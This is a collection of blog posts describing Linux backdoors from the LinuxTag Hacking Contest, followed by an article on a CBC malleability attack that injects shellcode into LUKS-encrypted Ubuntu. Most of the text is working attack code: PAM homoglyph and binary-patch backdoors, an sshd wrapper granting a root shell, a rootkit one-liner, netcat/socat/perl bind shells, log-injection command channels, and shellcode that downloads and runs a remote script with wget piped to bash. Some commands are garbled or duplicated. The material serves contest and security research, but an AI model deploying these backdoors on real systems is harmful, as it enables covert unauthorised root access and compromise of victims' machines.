[Hacking-Contest] Invisible configuration file backdooring with Unicode homoglyphs

Imagine that you want to check a small configuration file for malicious manipulations. Let's further assume that the file is very small (only 5 non-comment lines) and that you know the expected contents of the configuration file very well. Doesn't it sound like a really easy task to find out whether there is a backdoor in the configuration file or not? Well, it may have been a simple task until Linux distributions started to enable Unicode in the default installation. Today things are a little bit different and it is entirely possible to make a malicious manipulation to a simple configuration file which can't be seen when viewing the file in a terminal with cat, less or a text editor using a Unicode homoglyph attack .

Before we start, let's take a quick look at the file /etc/pam.d/common-auth:

[...]
auth    [success=1 default=ignore]      pam_unix.so nullok_secure
# here's the fallback if no module succeeds
auth    requisite                       pam_deny.so
[...]

The entry "success=1" for pam_unix.so means that the following line (the call to pam_deny.so) is skipped if the module pam_unix.so (which does the standard unix password checking) succeeds. If the password checking fails (e.g. because the user entered an invalid password), the call to pam_deny.so is executed, which makes the authentication fail. The following two lines add a nearly invisible backdoor to this configuration file:

cp /lib/*/security/pam_permit.so /lib/security/pam_de
 
First of all, the file pam_permit.so is copied to /lib/security/pam_deոy.so (the 'n' in pam_deny.so is replaced with the Unicode character u+578, which looks more or less exactly like the real 'n' in many fonts). The perl script then changes the file name pam_deny.so in the configuration file to pam_deոy.so with the Unicode character u+578 instead of the 'n' so that it points to our copy of pam_permit.so instead of the original pam_deny.so file. The result of this is that if even if the password checking in pam_unix.so fails, the call to pam_permit.so makes sure that the authentication still succeeds. Since the two characters look exactly the same with many terminal fonts, the configuration file looks like the original when viewed with cat, less or a text editor. Therefore this backdoor is pretty difficult to detect even if the system administrator takes a close look at the manipulated configuration file.
\u578'y.so
perl -i -pe's/deny/de\x{578}y/' /etc/pam.d/common-auth

First of all, the file pam_permit.so is copied to /lib/security/pam_deոy.so (the 'n' in pam_deny.so is replaced with the Unicode character u+578, which looks more or less exactly like the real 'n' in many fonts). The perl script then changes the file name pam_deny.so in the configuration file to pam_deոy.so with the Unicode character u+578 instead of the 'n' so that it points to our copy of pam_permit.so instead of the original pam_deny.so file. The result of this is that if even if the password checking in pam_unix.so fails, the call to pam_permit.so makes sure that the authentication still succeeds. Since the two characters look exactly the same with many terminal fonts, the configuration file looks like the original when viewed with cat, less or a text editor. Therefore this backdoor is pretty difficult to detect even if the system administrator takes a close look at the manipulated configuration file.

[Hacking-Contest] SSH Server wrapper

This blogpost shows how the SSH server can be replaced with a small wrapper script to allow full unauthenticated remote root access without disturbing the normal operation of the service. In order to install the wrapper script, the original SSH server must be renamed or moved to another directory. I have chosen to just move the binary from /usr/sbin/ to /usr/bin/:

cd /usr/sbin
mv sshd ../bin
vi sshd

Then type in the following small wrapper script:

#!/usr/bin/perl
exec"/bin/sh"if(getpeername(STDIN)=~/^..LF/);
exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;

Finally the wrapper script must be made executable e.g. with the following command:

chmod 755 sshd

In the normal operation of the ssh server, the wrapper script just executes the original sshd binary (which has been moved to /usr/bin/sshd) with all the given command-line arguments. If STDIN is a socket and the source port of the connected client happens to be 19526 (the string "LF" converted from ASCII to a big-endian 16 bit integer), the wrapper however executes /bin/sh instead, which gives the client an unauthenticated remote root shell.

Like many other network services, the OpenSSH server forks a new child process when receiving a new TCP connection. However, contrary to most other services, it doesn't directly serve the client in the child process after the fork. Instead it re-executes its own binary (typically /usr/sbin/sshd) in the child process so that the client is handled by a new instance of the sshd process (which makes ASLR more effective by giving each child process a different randomized memory layout). For this child process, the file descriptors STDIN/STDOUT are connected to the client socket.

In order to exploit the backdoor to get a remote root shell, you have to connect to the SSH service from source port 19526, which can easily be achieved with the following command:

socat STDIO TCP4:target_ip:22,sourceport=19526

[Hacking-Contest] Binary planting

Most Linux distributions have some kind of checksum support in the package manager which can be used to detect manipulations of existing programs in the filesystem. However, these checksums only verify the integrity of files which are legitimately shipped with a distribution package but they do not check whether an attacker has added additional files to the filesystem. This may look like a minor problem at first glance because the attacker can't add references to the additional files without manipulating existing files. However, when running a command e.g. from a shell script, the system will sequentially try to find the command in all the directories in the PATH environment variable. If there are two matching executables in two different PATH entries, the first one will be used without triggering any warning. So if we add a malicious binary in the first PATH entry while the legitimate one is somewhere later in PATH, the malicious binary is used instead of the original one. The same also applies to shared objects, which are loaded from various directories (LD_LIBRARY_PATH and the default directories /usr/lib and /lib).

For the Hacking Contest, we have used binary planting to install a small wrapper script for the uname program. In order to do so, we have created a shell script with the following contents in /usr/bin/uname:

#!/bin/sh
mount --bind /lib/*/*/pam_permit.so /lib/*/*/pam_unix.so 2>/dev/null
/bin/uname $*

The script will try to use mount --bind to replace the pam_unix.so library with pam_permit.so. The effect of this manipulation is that password checking is disabled so that an attacker can log in locally or via ssh without or with an incorrect password. All errors of the mount command are ignored (sent to /dev/null) so that the script doesn't output any errors when running as a non-root user. After that, it calls the original uname program in /bin/uname so that the command still does the intended functionality.

Since /usr/bin is before /bin in the default PATH, any scripts calling uname will use the backdoored version instead of the original. Since some scripts executed during logout/login to the system use uname, the backdoored program will be run between the phases of the Hacking Contest, so that the backdoor is recreated between phase 2 and phase 3 even if the defenders have found and removed the additional mounts during phase 2.

The binary planting trick is obviously not limited to the uname binary. There are countless other commands which are routinely used in shell scripts and many of them can easily be used for a similar backdoor.

[Hacking-Contest] Rootkit

Basic operation of rootkit

This blogpost shows how to install a simple rootkit with one single (but relatively long) line on a terminal. While the rootkit is not as capable and hard to detect as a full kernel rootkit, it is still able to hide itself, other files, running processes and even open TCP/UDP ports from the system administrator. We have used variations of this rootkit in the hacking contest for several years and it has never been detected and removed in phase 2.

The rootkit works by replacing the commands ls, netstat, ps, lsof and find with a simple wrapper, which calls the original command with all arguments and pipes the output to "grep -vE 'regex_of_stuff_to_hide'" to filter out lines of the output. There are two variations of the rootkit. The first one uses a simple shell script for the wrapper while the second one compiles a small c program instead (which makes the rootkit harder to detect and analyze in the limited time of the hacking contest).

Shell script version of rootkit

The shell script version is still useful if the system doesn't contain a c compiler:

which ls netstat ps lsof find|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|177\"";chmod 493,$o'

The which command lists the absolute path of the programs to maniuplate in the rootkit. These absolute paths are passed to a perl one-liner. The perl program starts with defining the variables $s and $n, which are initialized with the Unicode characters u+455 and u+578. These characters look like the ascii characters "s" and "n". Then it copies the filename of the original filename to $o and changes the filename in $_ by replacing the "s" in ls, netstat, ps and lsof with u+455 and the "n" in find with u+578. The result of these replacements is a new filename which looks exactly like the original filename. The original program is then renamed to the new name and then replaced with a shell script, which calls the renamed original program ($_) and pipes the output to grep. The grep command filters lines containing one of the following:

  • Unicode characters used by the rootkit ([$s-$n]) => Makes the rootkit self-hiding
  • The string "grep" => Don't show that grep is running in the output of ps
  • The string "177" => This is used for the stuff which should be hidden by the rootkit.

This rootkit is pretty easy to detect and analyze because it can easily be seen with the file command that programs like ps or ls have changed the type from an ELF binary to a shell script. After discovering the rootkit, it is also pretty easy to analyze the functionality of it and then selectively find the backdoors hidden by the rootkit.

C version of rootkit

In order to make finding and analyzing the rootkit more difficult, it is also possible to compile small binaries instead of the shell script:

which ls netstat ps lsof find|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,"|gcc -xc - -o$o";print F qq{int main(int a,char**b){char*c[999999]={"sh","-c","$_ \$*|grep -vE \\"177|\$\$|[$s-$n]|grep\\""};memcpy(c+3,b,8*a);execv("/bin/sh",c);}}'

The beginning is pretty much like the first variant of the rootkit. However, insted of directly writing the wrapper program, the perl script opens a pipe to gcc and writes a small C program to this pipe. The following shows a more readable version of the C program:

int main(int a,char**b){
  char*c[999999]={"sh","-c","original_program \$*|grep -vE \\"177|\$\$|[$s-$n]|grep\\""};
  memcpy(c+3,b,8*a);
  execv("/bin/sh",c);
}

The first line initializes the argument array for execv with "sh -c" and the same shell command as the first variant of the rootkit while the second line copies all remaining arguments from the argv array passed to the wrapper binary to the end of the argument array for execv.

Using the rootkit to hide stuff

The following section shows some of the stuff which can be hidden by the rootkit. In order to hide a process using the rootkit, it must match the regular expression of the grep command. This can easily be achieved by making the process name contain the string "177". For hiding open ports from netstat/lsof, the port number has to contain "177".

File hiding below the proc filesystem

Another interesting dilemma when hiding backdoors is whether you want to leave the backdoor binary in the filesystem or not. If you keep the binaries in the filesystem, the backdoor can be found and detected there. On the other hand, it is relatively uncommon to have open file descriptors to deleted files on a typical desktop Linux system and so a defender can easily spot processes with open file handles to deleted files using e.g. the following command:

ls -l /proc/*/fd|grep deleted

In order to come around this limitation, we have found a clever new way of hiding files from the system administrator without deleting the files: Unmounting the /proc directory, place the files in /proc on the root filesystem and remount the proc filesystem. Since there may be processes accessing the proc filesystem while we try to unmount it, we use the -l option of umount for lazy unmounting:

umount -l /proc

Now we can create a few files there for our backdoors:

cd /proc
cp /usr/bin/perl 177a
cp /usr/sbin/tcpdump 177b
cp /bin/nc.tr* 177c
cp `which socat` 177d
mknod 177e c 4 9 # This is a copy of /dev/tty9
ln /var/log/auth.log 177f

Netcat remote shell

The first backdoor is a simple netcat listener with a shell attached (177c is a copy of nc.traditional):

./177c -l -p 3177 -e /bin/sh &

If there is no compatible netcat available, we can use socat (177d) or perl (177a) instead:

./177d TCP4-Listen:3177,fork EXEC:/bin/sh &

And if socat is missing as well, we can still use perl:

./177a -MIO -e'$s=new IO::Socket::INET(LocalPort=>1337,Listen=>1);while($c=$s->accept()){$_=<$c>;print $c `$_`;}'&

Due to the rootkit these processes and the open port can't be seen with standard system tools like ps or netstat.

Using tcpdump as a covert communication path

Another backdoor can be built based on tcpdump (which has been copied to 177b):

./177b -iany -n -A udp 2>&1|./177a -ne'system($1)if/LEGO(.*)/'&

This command makes tcpdump listen for udp packets on any interfaces and due to the -A option it outputs the raw packet data to STDOUT, which is then piped to a small perl one-liner, which checks for a marker (the string "LEGO") and passes everything from there to system(). This backdoor is particularly interesting because it provides remote root access without any open ports (which might still be detected e.g. with a port scan).

SCTP remote shell

The followinig backdoor uses socat (copied to 177d) to open a backdoor via SCTP.

./177d SCTP-Listen:1177,fork EXEC:/bin/bash&

Since SCTP is not listed with netstat, it is less likely to be detected than a standard backdoor via TCP/UDP.

Hidden shell on /dev/tty9

The following uses perl (177a) to open a shell to /dev/tty9 (177e), which can be accessed via [CTRL]+[ALT]+[F9].

./177a -pe'system$_'<177e>177e&

Opening a shell on tty devices like this is an old trick and well-prepared teams usually check for that kind of backdoors by switching over all virtual terminals and looking for a shell prompt (due to the perl one-liner instead of a real shell there is no visible shell prompt with our exploit) or by running a command like "lsof -n /dev/tty*" (which won't detect our version of the backdoor since we recreated the device with mknod).

Covert communication path with sshd and /var/log/auth.log

The following perl (177a) one-liner continiously monitors 177f (which is a hard link to /var/log/auth.log) for a magic string ("LEGO") and parses the following characters as hex-encoded string, which is then decoded and passed to system.

./177a -e'while(1){sleep(1);while(<>){system pack("H*",$1)if/LEGO(\w+)/}}'<177f&

This can be exploited by trying to log in with a specially crafted username via ssh. The ssh server writes an error message to /var/log/auth.log and since the error message contains the username, this can be used to remotely inject arbitrary code to the system:

# Hex-encode our shell command:
perl -e 'print "LEGO".unpack("H*","id > /tmp/auth.owned")."\n"'
LEGO6964203e202f746d702f617574682e6f776e6564
# Use the resulting string as a username for an ssh login to get the command executed:
ssh LEGO6964203e202f746d702f617574682e6f776e6564@target_ip

After installing the backdoor programs to /proc, we can remount the proc filesystem to hide the files from the administrator:

mount -t proc proc /proc

Since the files still exist hidden below the proc filesystem, they are not listed as deleted files in /proc/pid/fd.

[Hacking-Contest] Backdooring rsyslogd

The following few lines add a backdoor to rsyslogd, which can be remotely exploited given that the backdoored host runs an SSH server:

man -a rsyslogd syslog|perl -pe'print "auth.* ^/bin/atg "if$.==177;print"#"' > /etc/rsyslog.d/README.conf
echo -e '#!/bin/sh\nsh -c "$1"'>/bin/atg
chmod 755 /bin/atg
/etc/init.d/rsyslog restart

Given the strict time limits of the Hacking Contest, the first line is optimized for size instead of readability. The basic function is to write the line "auth.* ^/bin/atg " to the file /etc/rsyslogd/README.conf. In order to confuse defenders, the sript creates a relatively large file with somewhat legitimately-looking comments, which are generated by using the manpages of rsyslogd and syslog, commenting out every single line of the manpages and adding the actual payload somewhere between (at line 177).

The next two lines create the script /bin/atg, which will just execute the first given command-line parameter (which is the log message from rsyslogd) with sh -c. Finally it is also required to restart rsyslogd in order to make the changes effective.

In order to exploit this vulnerability, it is required to get an attacker-controlled log message to rsyslogd. The ssh protocol requires both sides to exchange a version string in the first line. OpenSSH by default logs the version string of the client to syslog, which means that an unauthenticated remote attacker can create more or less arbitrary log messages. The following line shows how to remotely create a log message which exploits this backdoor by writing the output of the id command to /tmp/rsyslogd.owned.

echo "';id>/tmp/rsyslogd.owned;'"|nc target_ip 22

The semicolons in the beginning and end are required so that the shell executed from /bin/atg ignores the log message before/after the attacker-controlled content.

[Hacking-Contest] Hiding stuff from the terminal

The file /proc/sys/kernel/core_pattern typically contains the name of the coredump file which is created if a process crashes. Instead of a simple filename, /proc/sys/kernel/core_pattern can also contain a pipe character and a program. In this case the kernel launches the given program as root and pipes the coredump data to this process instead of writing it to a simple file. Since the program is executed as root, it provides a simple way of adding a local root backdoor to a Linux system. This trick has been used in the LinuxTag Hacking Contest for many years and well-prepared teams will typically check the contents of /proc/sys/kernel/core_pattern during phase 2 to detect this kind of manipulation.

In order to still successfully use this backdoor, I have come up with the following trick:

echo -e "|/tmp/lego \rcore      " >  /proc/sys/kernel/core_pattern

The carriage return character (\r) makes the terminal jump to the beginning of the line when displayed in the terminal. Contrary to a newline character (\n), the terminal does not jump to the next line on the screen. So the contents at the beginning of the line are overwritten with the stuff after the carriage return. When displaying the contents of /proc/sys/kernel/core_pattern using cat, you see just the string "core" with a few appended spaces, which won't raise any suspicion since "core" is the default content of /proc/sys/kernel/core_pattern. However, when a process crashes, the kernel still executes the binary /tmp/lego (which can be created by an unprivileged local user).

[Hacking-Contest] Disabling password protection with a small binary patch

This blogpost shows how to create a backdoor by changing a few binary instructions in the pam_unix.so shared library file, which is responsible for checking the user password. Unlike most other binary patches, this one works with a wide variety of Linux distributions (since it dynamically finds the correct position in the binary) and it works on both i386 and X86_64 (since the injected instructions work on both architectures).

perl -e'$n=;open F,"+<$n";seek(F,hex(`nm -D $n|grep sm_au`),0);print F "H1\xc0\xc3"'

The perl program is optimized for minimum size (so that it can be typed in as quickly as possible) instead of readability. The first thing it does is to use wildcards to find the location of the pam_unix.so library, which is typically located in /lib/x86_64-linux-gnu/security/pam_unix.so on a 64-bit system. After opening the file for reading and writing the program uses the nm program to list all exported symbols of the library and grep to find the location of pam_sm_authenticate in the output of nm. Since the output of nm is a hexadecimal offset in the file, the program uses the hex() function to convert it to a number (which will silently ignore the rest of the line after the offset). Then the program seeks to the position of the function pam_sm_authenticate and writes the four bytes "H1\xc0\xc3" to this position.

Disassembling the four bytes leads to the following instructions on i386:

   0:   48         dec    %eax 		# This first instruction is irrelevant for the exploit
   1:   31 c0      xor    %eax,%eax	# Set %eax register to zero
   3:   c3         ret 			# Return to caller

Disassembling the same binary leads to the following instructions on X86_64:

   0:   48 31 c0   xor    %rax,%rax	# Set %rax register to zero
   3:   c3         retq   		# Return to caller

Since i386 uses the %eax register and X86_64 uses the %rax register (the 64-bit version of %eax) for passing the return value of a function to the caller, the injected assembly instructions are equivalent to "return 0;" for both architectures. The pam_sm_authenticate() function is supposed to return PAM_SUCCESS (which is defined as 0) if the authentication was successful. Since the patched function always returns zero, the authentication will succeed even if the user doesn't enter the correct password.

[Hacking-Contest] Process hiding with mount

On Linux systems, process management tools like ps or top use the contents of the /proc directory to get a listing of all running processes and the contents of the /proc/[pid] directory for getting more information such as the process name, the command-line arguments or the user/group id of a given process. Since processes may legitimately disappear (terminate) between getting a directory listing of /proc and getting more information about the process, these tools will silently ignore empty directories in /proc. This can be exploited for hiding malicious processes by mounting something else (such as another directory with mount --bind) to /proc/[pid] to hide a given process from the system administrator. While this trick is not new and we were not the first team to use it in the Hacking Contest, we did find a new way of hiding the additional mounts from the system administrator. Typically an administrator will use the "mount" command without any parameters to get a list of all current mounts of the system. One team has already used the alias feature of the shell to manipulate the "mount" command so that it doesn't display the additional mounts inside /proc/.

Since the "mount" command only uses the file /etc/mtab and not /proc/mounts (which is provided by the kernel and can't easily be spoofed), we can also hide the additional mounts by saving a backup of /etc/mtab and restoring it after doing the additional mounts:

cp /etc/mtab /x
mount --bind /bin /proc/[pid]
mv /x /etc/mtab

[Hacking-Contest] Introduction

The hacking contest is a yearly competition taking place at the LinuxTag in Berlin. The setup consists of two notebooks with a projector attached to each of them. In phase 1 both teams get a root shell on the notebook and can do arbitrary manipulations to the Linux systems in order to place backdoors. After 15 minutes the teams switch notebooks for phase 2 and each team has the task to find and fix the backdoors placed by the other team in phase 1. After another 15 minutes the teams switch notebooks again and demonstrate the backdoors which are still working. In order to limit the complexity of the backdoors and prevent practically undetectable attacks such as a kernel rootkit, the teams have to enter the exploits to the system with nothing but a standard keyboard/mouse and paper notes.

Some exploits which have been used for the hacking contest in the past are already online at http://blogs.gnome.org/muelli/2011/05/linuxtag-hacking-contest-notes/. In the following series of blogposts I will describe some of the exploits we (Team LEGOFAN) have used in the past years.

The main conclusion of the competition is that there are so many possibilities of hiding a backdoor on a Linux system given temporary root access to the system and that it is practically impossible to securely clean up an infected system without reinstalling. The hacking contest also shows that a well-hidden backdoor doesn't necessarily require a lot of code such as a full kernel rootkit and that it is entirely possible to type in a backdoor via a standard keyboard within a very short time.

Practical malleability attack against CBC-Encrypted LUKS partitions

I. Abstract

The most popular full disk encryption solution for Linux is LUKS (Linux Unified Key Setup), which provides an easy to use encryption layer for block devices. By default, newly generated LUKS devices are set up with 256-bit AES in CBC mode. Since there is no integrity protection/checksum, it is obviously possible to destroy parts of plaintext files by changing the corresponding ciphertext blocks. Nevertheless many users expect the encryption to make sure that an attacker can only change the plaintext to an unpredictable random value. The CBC mode used by default in LUKS however allows some more targeted manipulation of the plaintext file given that the attacker knows the original plaintext. This article demonstrates how this can be used to inject a full remote code execution backdoor into an encrypted installation of Ubuntu 12.04 created by the alternate installer (the default installer of Ubuntu 12.04 doesn't allow setting up full disk encryption).

II. Attack scenario

One basic problem of full disk encryption is that there must be some kind of software asking the user for the passphrase. This software can't be encrypted as well since it must be started before the user enters the passphrase and thus before the encrypted partition is opened. For Linux systems encrypted with LUKS, the bootloader and the partition /boot (which contains the kernel and initrd) are typically not encrypted. Given physical access to the system an attacker can easily modify the initrd so that it logs the key and sends it to the attacker or even installs a rootkit after mounting the encrypted filesystem. This attack is known as evil maid attack and it has been demonstrated against Truecrypt [1].

Some users try to prevent this attack by booting the system from a bootable USB stick containing the components required to boot the encrypted system on the hard disk. This allows removing the USB stick and physically guard it against unauthorized manipulation while leaving the computer with the encrypted root filesystem unattended. An attacker having physical access to the computer can then only access the encrypted disk on the computer. Given this physical access, it is obviously possible to destroy data but many users expect the encryption to prevent targeted manipulation of encrypted files. So they assume that the system is still secure when booting it from an unmanipulated USB stick as long as there is no hardware manipulation (such as a hardware keylogger or a reflashed BIOS).

Even if the kernel/initrd/bootloader are stored on the system itself, the user may have reason to believe that someone has installed a backdoor to the unencrypted initrd on the /boot partition. This may be the case e.g. when the user gets the computer back after it had been stolen, confiscated by law enforcement or after a suspicious customs inspection. In that case, the user might try to clean up the computer by mounting the encrypted filesystem from a trusted live cd and then reinstalling the /boot partition with kernel/initrd and the bootloader. Many users expect that data on the encrypted partition may be damaged but they believe it is impossible to do a more targeted attack such as placing a rootkit on it without knowing the encryption key. The following section shows that this assumption is not valid and that it is in fact possible to add a full remote code execution backdoor to the encrypted partition without knowing the encryption key.

III. Description of CBC malleability attack

It has already been known for a long time that CBC does not prevent a malleability attack (targeted manipulation of encrypted data) given that the attacker can modify the ciphertext and knows the corresponding plaintext as well. Since many files on an encrypted computer such as OS components aren't actually secret and can easily be downloaded from the Internet, an attacker can easily gain access to parts of the plaintext of an encrypted system disk. This section shows how the manipulation is done on a theoretical level while section IV shows the technical details of how to implement the attack against a real-world installation of Ubuntu 12.04.

The following picture (from Wikipedia) shows the process of decrypting data with CBC:
601px-CBC_decryption.svg

In the following I assume that we already have access to the original plaintext and the ciphertext of one file on the system and that we want to do our manipulations in this file:

p_i: Original plaintext block i
c_i: Ciphertext block i
x_i: Shellcode chunk we want to inject to block i

Let's assume we want to manipulate the contents of block i of the ciphertext. Since we already know the plaintext of block i and the ciphertext of block i and block (i-1), we can use the following equation to calculate DEC(c_i,key):
p_i = DEC(c_i,key) XOR c_{i-1}
DEC(c_i,key) = c_{i-1} XOR p_i

Since we know DEC(c_i,key), we can use the equation above to manipulate the ciphertext block c_{i-1} so that p_i = x_i:
c_{i-1} = DEC(c_i,key) XOR x_i

Putting this back to the decryption equation:
p_i = DEC(c_i,key) XOR c_{i-1} = DEC(c_i,key) XOR DEC(c_i,key) XOR x_i = x_i

However, as this attack involves changing the previous ciphertext block, the previous plaintext block will also be changed to a random (and unpredictable) value. We can use this technique to change every 2nd plaintext block in a sector to anything we want to while destroying the blocks between the manipulated blocks. Given a blocksize of 16 bytes (128 bits) this does allow injecting more or less arbitrary shellcode to an executable file by dividing the shellcode to small chunks and adding JMP instructions to jump over the garbage blocks.

IV. Technical considerations and practical attack against Ubuntu 12.04

1. Choice of system for demonstration

I have decided to demonstrate the attack with an Ubuntu 12.04 amd64 system with LUKS encryption, LVM (Logical Volume Manager) and an ext4 filesystem as set up by the alternate installation CD provided by Ubuntu. I have done the installation in a Virtualbox VM with 1024 Mb Ram and an 8 Gb simulated hard disk.

2. Filesystem considerations

For implementing the attack, we need to know the exact position of the file we want to modify on the physical hard disk. Finding the location of the data blocks of a file in a given ext4 filesystem is possible with the following command:

# debugfs -R "dump_extents /bin/dash" /dev/mapper/ubuntu-root
Level Entries       Logical          Physical Length Flags
 0/ 0   1/  1     0 -    26   42048 -   42074     27

This output shows that the data of /bin/dash is located in the blocks 42048-42074 of the device /dev/mapper/ubuntu-root. These block numbers can be multiplied with the block size of the filesystem (in this case 4k) to get the actual byte position of the file on the device.

Experiments have shown that the first files copied to the filesystem during the installation process typically end up at the same block position on the device. So an attacker can predict the position of a file by doing a reference installation with the same installation media on a sufficiently similar system and looking up the position of the file on this reference installation. For some reason the physical position of files written later in the installation process isn't fully predictable and varies between multiple installations. Since a newly created ext4 filesystem allocates the space for files in a roughly sequential order, we can just sort all files by the position on the filesystem in order to find the files written early in the installation process:

#! /usr/bin/perl
 
use warnings;
 
my %files; # Filename =&gt; First physical block
 
open FIND,"-|","find","/","-xdev","-type","f";
open FH,"&gt; /tmp/debugfs_commands.txt";
while(){
    print FH "dump_extents $_";
}
open DEBUGFS,"-|","debugfs","-f","/tmp/debugfs_commands.txt","/dev/sda1";
my $file;
while(){
    chomp;
    $file = $1 if(/dump_extents\s+(\S+)$/);
    next unless defined $file;
    next unless my($logicalStart,$logicalEnd,$physicalStart,$physicalEnd) = /\s*(\d+)\s*\-\s*(\d+)\s+(\d+)\s*\-\s*(\d+)/;
    $files{$file} = $physicalStart;
    $file = undef;
}
 
for my $file (sort {$files{$a} &lt;=&gt; $files{$b}} keys %files){
    printf("%10d: %s\n",$files{$file},$file);
}

3. Calculating physical location from filesystem block through LVM and LUKS

The default LVM installation done when choosing to set up an encrypted LVM in the Ubuntu 12.04 alternate installer sets up a LVM physical volume with two logical volumes for the root filesystem and swap. The first logical volume is the root filesystem and it starts directly after the PV (physical volume) header. The following command displays the size of the PV header in sectors (in that respect the sector size is always 512 bytes even if the hard disk has a physical sector size of 4 KiB):

# grep -a -m1 pe_start /dev/mapper/sda5_crypt
pe_start = 384

The actual start of the first logical volume is located at sector 384 (192 KiB) for an installation done with the Ubuntu 12.04 alternate installer. This is the position within the LUKS volume where the ext4 filesystem starts.

The LUKS encryption also adds a header at the beginning of the encrypted partition. For the version of cryptsetup included with Ubuntu 12.04 the LUKS header has a size of 4096 sectors (2 Mib). This means that we have to add another offset of 4096*512 bytes to get the position in the physical partition (/dev/sda5). In total we have to add 4096*512 + 384*512 bytes to the position within the filesystem obtained with debugfs to get the location in the actual partition.

4. Choice of file to modify

For a reliable attack we have to choose a file which is written at an early state in the installation process so that we can reliably predict the blocks the file is written to. Since we want to inject code, the file must contain some kind of executable code (either script or binary) which is actually executed e.g. during system startup so that we get our injected code executed.

Since the attack vector only allows choosing every 2nd 16 bytes block while the other blocks between are replaced with (unpredictable) garbage, our modifications will create some kind of damage to the file. Given sufficient effort it may be possible to repair the damage by replicating the damaged/overwritten code in unused parts within the file. However, carrying out the attack is significantly easier if we find a file which is run during system startup and we can replace the functionality of the file by other programs available on the system.

For the demonstration of this attack I have chosen the file /bin/dash, which is the default shell of Ubuntu 12.04. Since the manipulation does destroy the functionality of /bin/dash, I have chosen to restore the original functionality using /bin/bash. The file /bin/dash is also written in a relatively early state of the system installation with the Ubuntu 12.04 alternate installer so that the position can be reliably predicted. Moreover, there haven't been any updates to dash since the initial release of Ubuntu 12.04 and so the dash binary is still at the original position even if the user has installed all updates from Ubuntu 12.04.

5. Details of the manipulation

I have decided to inject code at the position of the main() function of /bin/dash, which is located at address 0x402090 or position 0x2090 in the file /bin/dash. This makes sure that the injected code is actually executed and it also allows easy access to the argv and envp pointer, which are passed as argument to main(). Since the initialization code (start address of the ELF header) is located shortly after the main() function (address 0x40224c) and the exploit doesn't fit in the space between, I have chosen to overwrite main() with a single jmp instruction to a place later in the binary, which isn't required for the program initialization.

The exploit replaces the functionality of /bin/dash with the following equivalent C code:

int main(int argc,char**argv,char**envp){
  char* bash_argv[] = {"bash","-c","(echo 'nohup bash -c \"until wget -q -O - www.jakoblell.com/luks_exploit.sh|bash;do sleep 30;done\" &amp;'&gt;&gt;/etc/init.d/rc.local)2&gt;/dev/null &amp;&amp; ln -sf /bin/bash /bin/sh",0};
  if(fork() == 0){ // child process, start exploit
    execve("/bin/bash",bash_argv,envp);
  } else{ // parent process, run bash and pass all arguments
    execve("/bin/bash",argv,envp);
  }
}

When the modified dash shell is executed, it tries to append a line to the file /etc/init.d/rc.local, which is the init script responsible for running /etc/rc.local at the end of the boot process. If it succeeds (it may not succeed the first time because the root filesystem is mounted read-only in the beginning of the boot process), it changes the /bin/sh symlink from dash to bash, so that the system uses bash instead of the modified dash for executing shell scripts from then on.

I have choosen to write the code to /etc/init.d/rc.local instead of /etc/rc.local (which is the recommeded way of adding local scripts which should be run after bootup) because the default /etc/rc.local contains the line "exit 0" at the end and so an appended command wouldn't be executed. The appended line tries to download and execute a shell script from the Internet every 30 seconds until it succeeds.

The following code creates the shellcode as an ELF object file:

#! /usr/bin/perl
 
# File to patch: /bin/dash, SHA256 e9a7e1fd86f5aadc23c459cb05067f49cd43038f06da0c1d9f67fbcd627d622c
# main() at address 0x402090 =&gt; File pos 0x2090
# execve@plt at address 0x401d70 =&gt; File pos 0x1d70
# fork@plt at address 0x402030 =&gt; File pos 0x2030
 
use warnings;
 
open OUT,"&gt; shellcode.S";
print OUT ".balign 16\n";
print OUT ".ascii \" SHELLCODE_START\"\n";
print OUT ".global shellcode1\n";
print OUT "shellcode1:\n";
# Position of main(), just insert a jump to the actual shellcode location
my $posInFile = 0x2090;
print OUT "jmp shellcode2\n";
$posInFile += 5;
# Add NOP statements until we reach the correct position for the actual shellcode
while($posInFile &lt; 0xaa40){
    print OUT "nop\n";
    $posInFile ++;
}
print OUT "shellcode2:\n";
 
my $nextShellcodeNum = 3;
 
# Allocate a stack frame for the required variables
addInstruction("mov %rsp,%rbp");
addInstruction('sub $100,%rsp');
# Save argv and envp
addInstruction("mov %rsi,-100(%rbp)"); # argv
addInstruction("mov %rdx,-92(%rbp)"); # envp
call(0x2030); # call fork()
# Jump to label CHILD if fork() returned 0
addInstruction('cmp $0x0,%rax');
addInstruction("je CHILD",2);
# This code is run in the parent process, call execve("/bin/bash",argv,envp) so that the shell invocation works as expected
pushString("/bin/bash");
addInstruction("push %rsp");
addInstruction("pop %rdi");
addInstruction("mov -100(%rbp),%rsi"); # argv
addInstruction("mov -92(%rbp),%rdx"); # envp
call(0x1d70); # execve("/bin/bash",argv,envp);
# This code is run in the child process:
# execve("/bin/bash",["bash","-c","(echo 'nohup bash -c \"until wget -q -O - www.jakoblell.com/luks_exploit.sh|bash;do sleep 30;done\" &amp;'&gt;&gt;/etc/init.d/rc.local)2&gt;/dev/null &amp;&amp; ln -sf /bin/bash /bin/sh"],envp)
addInstruction("CHILD:",0);
# Create argv array at -84(%rbp) in our stack frame
pushString("bash");
addInstruction("mov %rsp,-84(%rbp)");
pushString("-c");
addInstruction("mov %rsp,-76(%rbp)");
pushString(qq{(echo 'nohup bash -c "until wget -q -O - www.jakoblell.com/luks_exploit.sh|bash;do sleep 30;done" &amp;'&gt;&gt;/etc/init.d/rc.local)2&gt;/dev/null &amp;&amp; ln -sf /bin/bash /bin/sh});
addInstruction("mov %rsp,-68(%rbp)");
addInstruction('movq $0,-60(%rbp)');
# First argument to execve (filename)
pushString("/bin/bash");
addInstruction("push %rsp");
addInstruction("pop %rdi");
addInstruction("lea -84(%rbp),%rsi"); # argv
addInstruction("mov -92(%rbp),%rdx"); # envp
call(0x1d70); # call execve
print OUT ".balign 16\n";
print OUT ".ascii \"SHELLCODE_END\"\n";
close(OUT);
system("gcc -c shellcode.S");
die "Compiling shellcode failed" unless $?==0;
 
 
# Create a call instruction to a given position in the /bin/dash file, used for calling fork@plt and execve@plt
sub call{
    my($dstPos) = @_;
    my $nextInstPos = $posInFile + 5; # Position after this call instruction
    my $offset = ($dstPos - $nextInstPos);
    my $binary = "\xe8" . pack("V",$offset);
